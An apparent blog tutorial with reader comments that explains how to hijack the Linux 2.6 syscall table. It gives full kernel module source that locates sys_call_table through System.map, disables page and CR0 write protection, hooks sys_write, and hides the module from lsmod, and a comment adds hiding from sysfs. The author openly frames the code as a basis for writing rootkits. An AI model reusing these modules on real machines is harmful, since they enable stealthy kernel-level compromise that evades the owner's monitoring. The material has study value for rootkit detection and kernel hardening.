Syscall Hijacking: Kernel 2.6.* systems
In this guide I will explain how to hijack the syscall in kernel 2.6.*: in particular how to bypass the kernel write protection and the “protected mode” bit of the CR0 CPUs register.
I don’t explain what is a syscall or syscall table: I assume you know what it is.
– Accessing to Syscall Table
If you have tried to execute rootkit wrote for 2.4.* kernels then you will know that them don’t work in the 2.6.* kernel systems.
In kernel 2.6.* the “sys_call_table” is no longer exported and you can’t access it directly: moreover the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:
extern void *sys_call_table[]; ... sys_call_table[__NR_syscall] = pointer
But the table is still in the memory: if we know its memory address we can access it through a simple pointer. There are a lot of methods to find this address: the simplest is searching inside the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled: it contains all the symbols and their addresses used by the kernel.
The output of this file follows:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic ... c018d140 t cgroup_remount c018d260 T cgroup_path c018d310 t allocate_cg_links c018d410 t find_css_set c018d7d0 T cgroup_attach_task c018da40 T cgroup_clone c018dcc0 t cgroup_tasks_write c018dd90 t cgroup_release_agent c018df50 t proc_cgroup_show c018e180 t cgroup_pidlist_find c018e320 t cgroup_write_event_control c018e610 t pidlist_allocate c018e640 t pidlist_array_load ...
We are only interested at the “sys_call_table” address:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table c05d2180 R sys_call_table
– Bypass Kernel Write Protection
Now we have the table’s address: but if you have looked at the “grep” command you will have seen that there is an ‘R’: this means that this address is “read-only”.
Indeed the kernel poses some structures in the “read-only” memory zone: in this way it protects them against intentional or unintentional changes which can lead to system instability. So we have to set this structure in “read/write” mode if we want to modify them.
Fortunately, the kernel provides us with special functions for this task:
void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;
The “pages_rw” function sets the write mode on the page passed as an argument; the second one sets the read mode on the page passed as an argument. Bu we need the virtual address of the page in order to use it: we can use for this task the “virt_to_page()” function, that converts the virtual address of the page in the corresponding physical page of memory accessible by the kernel. In order to use the “pages_*” functions we have to know their addresses. We can obtain them from the “System.map” file:
spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro c012fbb0 T set_pages_rw c012fe80 T set_pages_ro
Now we can access and modify the sys_call_table in this way:
... unsigned long *syscall_table = (unsigned long *)0xc05d2180; ... void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80; ... static int init(void) { struct page *_sys_call_page; printk(KERN_ALERT "\nHIJACK INIT\n"); _sys_call_page = virt_to_page(&syscall_table); pages_rw(_sys_call_page, 1); // now we can use the sys_call_table ... }
This is an example source code (hijack.c):
#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> unsigned long *syscall_table = (unsigned long *)0xc05d2180; void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80; asmlinkage int (*original_write)(unsigned int, const char __user *, size_t); asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) { // hijacked write printk(KERN_ALERT "WRITE HIJACKED"); return (*original_write)(fd, buf, count); } static int init(void) { struct page *sys_call_page_temp; printk(KERN_ALERT "\nHIJACK INIT\n"); sys_call_page_temp = virt_to_page(&syscall_table); pages_rw(sys_call_page_temp, 1); original_write = (void *)syscall_table[__NR_write]; syscall_table[__NR_write] = new_write; return 0; } static void exit(void) { struct page *sys_call_page_temp; sys_call_page_temp = virt_to_page(syscall_table); syscall_table[__NR_write] = original_write; pages_ro(sys_call_page_temp, 1); printk(KERN_ALERT "MODULE EXIT\n"); return; } module_init(init); module_exit(exit);
Here is a “Makefile” to compile the source code:
obj-m := hijack.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
Now we can load our module:
spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
– Bypass CR0 Protection
Some CPUs have the 0-bit of the CR (control register) set to 0: this means that “protected mode” is enabled. The “protected mode” was introduced in Intel CPUs starting from Intel 80286. This bit is also called wp-bit: we can check if our CPU support this kind of protection in this way:
spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp wp : yes wp : yes
You can find here a brief description of the CR0 register. Reading from wikipedia you can see that bit 0 (WP) is the one that deals with the “protected mode”: if WP is set to 1 then the CPU is in “write-protect” mode; else it is in “read/write” mode.
If the CPU is in “write-protect” mode and if we try to load the “hijack.ko” module, the kernel will kill it:
spaccio@spaccio-laptop:~$ sudo insmod hijack.ko Killed
So if we set this bit to 0 we will have access to the memory pages (including the syscall table) in write mode.
Again the kernel provides us two functions:
#define read_cr0 () (native_read_cr0 ()) #define write_cr0 (x) (native_write_cr0 (x))
The native read/write functions are defined as follows:
static inline unsigned long native_read_cr0 (void) { unsigned long val; asm volatile("movl %%cr0,%0\n\t" :"=r" (val)); return val; } static inline void native_write_cr0 (unsigned long val) { asm volatile("movl %0,%%cr0": :"r" (val)); }
The “read_cr0” function returns the value of the register CR0; the “write_cr0” function sets the bits of the register based on the value passed as parameter.
Now we can enable/disable the protected mode in such way:
/* disable protected mode I perform a not operation to 0x10000 ( so I have 0x01111). Later I perform an AND operation between the current value of the CR0 register and 0x01111. So the WP bit is set to 0 and the protected mode is disabled. */ write_cr0 (read_cr0 () & (~ 0x10000)); /* enable protected mode I perform an OR operation between the current value of the CR0 register and 0x10000. So the WP bit is set to 1 and the protected mode is enabled. */ write_cr0 (read_cr0 () | 0x10000);
Follows “hijack.c” modified (“hijack2.c”):
#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> unsigned long *syscall_table = (unsigned long *)0xc05d2180; asmlinkage int (*original_write)(unsigned int, const char __user *, size_t); asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) { // hijacked write printk(KERN_ALERT "WRITE HIJACKED"); return (*original_write)(fd, buf, count); } static int init(void) { printk(KERN_ALERT "\nHIJACK INIT\n"); write_cr0 (read_cr0 () & (~ 0x10000)); original_write = (void *)syscall_table[__NR_write]; syscall_table[__NR_write] = new_write; write_cr0 (read_cr0 () | 0x10000); return 0; } static void exit(void) { write_cr0 (read_cr0 () & (~ 0x10000)); syscall_table[__NR_write] = original_write; write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "MODULE EXIT\n"); return; } module_init(init); module_exit(exit);
Makefile:
obj-m := hijack2.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
Now we can load our module without problems:
spaccio@spaccio-laptop:~$ sudo insmod hijack2 spaccio@spaccio-laptop:~$
– Hide Kernel Module
We can simply hide our module: we can remove it from the module list (lsmod and /proc/modules). Look at the following source code (“hijack3.c”):
#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> static int init(void) { list_del_init(&__this_module.list); return 0; } static void exit(void) { return; } module_init(init); module_exit(exit);
We compile and run it:
obj-m := hijack3.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
If we try to look through lsmod we cannot find our module:
spaccio@spaccio-laptop:~$ sudo insmod hijack3 spaccio@spaccio-laptop:~$ lsmod Module Size Used by kernel_redir 2200 1 aes_i586 7280 2 aes_generic 26875 1 aes_i586 rfcomm 33811 6 binfmt_misc 6599 1 sco 7998 2 bnep 9542 2 l2cap 37008 16 rfcomm,bnep vboxnetadp 6454 0 vboxnetflt 15216 0 ... spaccio@spaccio-laptop:~$ lsmod |grep hijack3.ko spaccio@spaccio-laptop:~$
This happens thanks to “list_del_init()” function. This function is defined as follows:
static inline void list_del_init (struct list_head * entry) { __list_del (entry->prev, entry->next); INIT_LIST_HEAD (entry); }
While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:
static inline void __list_del (struct list_head * prev, struct list_head * next) { next-> prev = prev; prev-> next = next; } static inline void INIT_LIST_HEAD (struct list_head * list) { list-> next = list; list-> prev = list; }
So the “list_del_init()” function removes the name of our module from the doubly linked list that manages the list of modules: in this way can not be found by lsmod (or in /proc/modules).
– Conclusion
The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).
Bye.
great work mate :)
great work, is very nice topic
hi,
when i try doing this trick on my box, thereis a few questions in my dumb brain:
– why u are using 0x10000 value when try to enable/disable cr0 on protected mode?
– if only ‘disable cr0 wp’ trick can bypass protection of at all.
why still need to disable page protection by ‘pages_rw((virt_to_pages…. ‘?
Hi Vjick, I have modified the post after your comment:
– now you can read the answer from the post;
– we don’t still need to disable the page protection with ‘pages_rw((virt_to_pages…. ‘: I have made a mistake in “cut & paste”.
Bye bye.
thanks for your reply, styx^..
btw, i can understand how the logic of AND,OR,and negation(~) in manipulating cpu register.
but im still confuse, why that 5th bit[(0x00010000) -cmiiw-] from the register value must be 1, while PE flags is in bit 0 and WP flags is in bit 16 (according to http://en.wikipedia.org/wiki/Control_register#CR0).
how can that happen? ;p
or maybe in overall, why the value must be [0x01111 / 0x10000] not [0x01111111 / 0x10000000] like in the common bit x86 cpu register to perform enable/disable PE?
thanks you, just confusing question in my humble-dumble head..
Hi Vjick:
– 0x10000 (exadecimal) stands for 000…010000000000000000 (binary)
– ~(0x10000) stands for 111…1101111111111111111
As you can see the 17th bit (WP) is set to 0. So you can write in the memory pages previously in read-only mode.
Bye bye.
yeah.. my fault, i jst wrong while convert(negationing) value in hex, not binary.
thanks you, styx.
Instead of using hardcoded addresses you could parse memory beetween 0xc0000000 and 0xd0000000 (x86) and check for syscall table.
You are right. Soon I’ll write a post about it.
Thank you for the hint.
Nice post.
On a side note Centos5.5 (probably other RH based distros?) does not provide pages_rw() and pages_ro() functions.
I don’t know how the Centos5.5 kernel works.
If you have tested my codes and they don’t work then you could/should be right :-).
Absolutely awesome writeup!!!
Will/can this method be used for hijacking kernel functions (not syscalls) given their address from System.map? If so, can you point me how to replace a function call with given address and parameter list?
Yes, you can do that, but I’ve never tried it. I think that the steps are the same of the syscall hijacking.
Bye.
Great writeup.
One question, can this method be done on a 64 bit machine.
pages_rw
pages_ro
Doesn’t exist in the System.map. What would be the equiv?
I don’t know the answer because I don’t have a 64 bit machine. Have you searched for set_memory_rw() and set_memory_ro() functions?
Bye.
I run 64-bit too.. have the following page/memory functions for 2.6.36:
ffffffff8102f1f0 T set_pages_rw
ffffffff8102ebe0 T set_memory_rw
ffffffff81a7c6b0 r __ksymtab_set_memory_rw
ffffffff81a8bdf8 r __kcrctab_set_memory_rw
ffffffff81a909e8 r __kstrtab_set_memory_rw
.
ffffffff8102f1b0 T set_pages_ro
ffffffff8102ebb0 T set_memory_ro
ffffffff81a7c6c0 r __ksymtab_set_memory_ro
ffffffff81a8be00 r __kcrctab_set_memory_ro
ffffffff81a909f6 r __kstrtab_set_memory_ro
Which one is correct to use? set_pages_xx or set_memory_xx?
You have to use set_pages_xx as you can read in the post.
These functions are defined in “arch/x86/mm/pageattr.c”:
int set_pages_ro(struct page *page, int numpages)
{
unsigned long addr = (unsigned long)page_address(page);
return set_memory_ro(addr, numpages);
}
int set_pages_rw(struct page *page, int numpages)
{
unsigned long addr = (unsigned long)page_address(page);
return set_memory_rw(addr, numpages);
}
As you can see they call the set_memory_xx functions.
Bye.
It seems that including provides native read_cr0 && write_cr0 calls, that was enough to replace some function’s call with my own, without using set_memory/set_page family. However, for some reason I suppose that replaced function didn’t receives the passed variables.. cheers.
Fixed: <asm/system.h>
Modules are not hidden in sysfs
you can use :
kobject_del(__this_module.holders_dir->parent);
Dear Blog-Author,
What a beautiful article this is! The way you have poured the concept is inspirative.
I liked this page, and the content remained helpful to me. I am thankful to you.
Thanks.
N. A. Joshi
thanks for sharing very much appreciated – mabuhay
Excellent Motorbike Site I like it Merci
I do believe all the ideas you’ve introduced on your post.
They are very convincing and can definitely work. Still, the posts are
too brief for beginners. Could you please lengthen them a bit from subsequent time?
Thanks for the post.